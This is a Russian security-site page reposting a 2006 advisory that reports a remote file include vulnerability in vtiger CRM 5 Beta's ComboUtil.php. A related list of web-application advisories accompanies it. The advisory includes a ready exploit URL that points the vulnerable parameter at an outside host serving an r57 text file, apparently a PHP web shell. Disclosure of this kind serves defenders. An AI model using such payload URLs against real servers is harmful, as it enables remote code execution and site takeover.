Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  WebspotBlogging => 3.0 Remote File Include Vulnerabilities

  DanPHPSupport => 0.5 Cross Site Scripting Vulnerabilities

  QB ( QuickBlogger ) =>1.4 Remote File Include Vulnerabilities

  php_news => 2.0 Remote File Include Vulnerabilities

From:crackers child <crackerscomputer_(at)_gmail.com>
Date:27 сентября 2006 г.
Subject:vtiger CRM 5 Beta Remote File Include Vulnerability

!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------


Title : vtiger CRM 5 Beta Remote File Include Vulnerability

--------------------------------------------------------------------------------

#Author: Crackers_Child


#[email protected]: [email protected]


-------------------------
-------------------------------------------------------

Download :  http://vtiger.com
--------------------------------------------------------------------------------

Bug in ComboUtil.php


require_once('include/database/PearDatabase.php');
function getComboArray($combofieldNames)

--------------------------------------------------------------------------------


Exploit:

http://www.site.com/vtiger_path/include/ComboUtil.php?combofieldNames=http:
//siberaktif.net/r57.txt
?


--------------------------------------------------------------------------------

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород